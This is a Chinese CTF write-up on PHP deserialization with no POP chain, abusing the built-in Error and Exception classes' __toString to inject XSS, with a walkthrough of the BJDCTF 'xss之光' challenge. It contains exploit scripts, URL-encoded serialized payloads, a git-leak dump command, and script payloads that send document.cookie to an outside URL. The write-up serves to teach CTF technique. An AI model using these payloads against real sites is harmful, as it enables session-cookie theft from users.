這周我做了一道利用php的原生類進行XSS的題目
文章圍繞着一個問題,如果在代碼審計中有反序列化點,但是在原本的代碼中找不到pop鏈該如何?N1CTF有一個無pop鏈的反序列化的題目,其中就是找到php內置類來進行反序列化。
基礎知識
首先還是來回顧一下序列化中的魔術方法,下面也將以此進行研究。
當對象被創建的時候調用:__construct
當對象被銷燬的時候調用:__destruct
當對象被當作一個字符串使用時候調用(不僅僅是echo的時候,比如file_exists()判斷也會觸發):__toString
序列化對象時就調用的方法(其返回需要是一個數組):__sleep
反序列化恢復對象時就調用的方法:__wakeup
當調用對象中不存在的方法會自動調用此方法:__call
利用__toString
__toString() 方法用於一個類被當成字符串時應怎樣迴應。例如 echo $obj; 應該顯示些什麼。此方法必須返回一個字符串
Error
適用於php7版本
Error類就是php的一個內置類用於自動自定義一個Error,在php7的環境下可能會造成一個xss漏洞,因爲它內置有一個toString的方法。如果有個pop鏈走到一半就走不通了,不如嘗試利用這個來做一個xss,其實我看到的還是有好一些cms會選擇直接使用 echo 一個反序列化以後的類 的寫法,前文說了當對象被當作一個字符串使用時候調用(如echo的時候)會觸發__toString方法,這個也看開發人員吧,好的開發人員應該不會這麼寫,但也是一種挖洞的新思路(對我而言)。
XSS
開啓報錯的情況下:
測試代碼:
<?php
$a = unserialize($_GET['yds']);
echo $a;
?>
exp:
<?php
$a = new Error("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
?>
//得:O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D 這就是生成的 urlencode($b)
則在URL中令
/?yds=O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D
併成功alert
Exception
適用於php5、7版本
這個類利用的方式和原理和Error 類一模一樣,但是適用於php5和php7,相對之下更加好用。
XSS
開啓報錯的情況下:
測試代碼:
<?php
$a = unserialize($_GET['yds']);
echo $a;
?>
exp:
<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>
//得:O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
echo unserialize($c);
則我們在url中令:
/?yds=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
併成功alert
例題——[BJDCTF 2nd]xss之光
拿到題開頭gungungun就不會了,沒想到是git泄露,直接:
python GitHack.py http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/.git/
拿到源碼:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
僅看到是一個反序列化,但是不知道類啊,這就遇到了一個反序列化但沒有pop鏈的情況,所以只能找到php內置類來進行反序列化;又發現有個echo;所以我們最好對有_toString方法的類進行反序列化;在 _toString()的原生類反序列化中,常用的是Error和Exception,Error只適於php7,Exception php5和php7都適用,這裏我們查看一下題目的環境發現是php5;
由於此題是xss,所以只要xss執行window.open()就能把flag帶出來,所以直接這樣:
<?php
$y1ng = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
//window.open 是 javaScript 打開新窗口的方法
也可以用window.location.href='url'來實現惡意跳轉
<?php
$a = new Exception("<script>window.location.href='http://8ff615f3-da70-4d1a-959f-f29d817ecd90.node3.buuoj.cn'+document.cookie</script>");
echo urlencode(serialize($a));
?>
或者用alert(document.cookie)直接彈出cookie,但此題不行,可能開了httponly(見附錄)。
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>
結果爲:
O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A110%3A%22%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A14%3A%22%2Fcode%2Fmain.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
訪問:
http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
在url中執行以下,flag就在cookies中
或在burp裏
其實這種xss的題的flag就藏在cookie裏面,所以有時在控制檯裏面就可以直接找到:
這種情況很少,幾乎不可能。
附錄:
什麼是HttpOnly?
如果cookie中設置了HttpOnly屬性,那麼通過js腳本將無法讀取到cookie信息,這樣能有效的防止XSS攻擊,竊取cookie內容,這樣就增加了cookie的安全性,即便是這樣,也不要將重要信息存入cookie。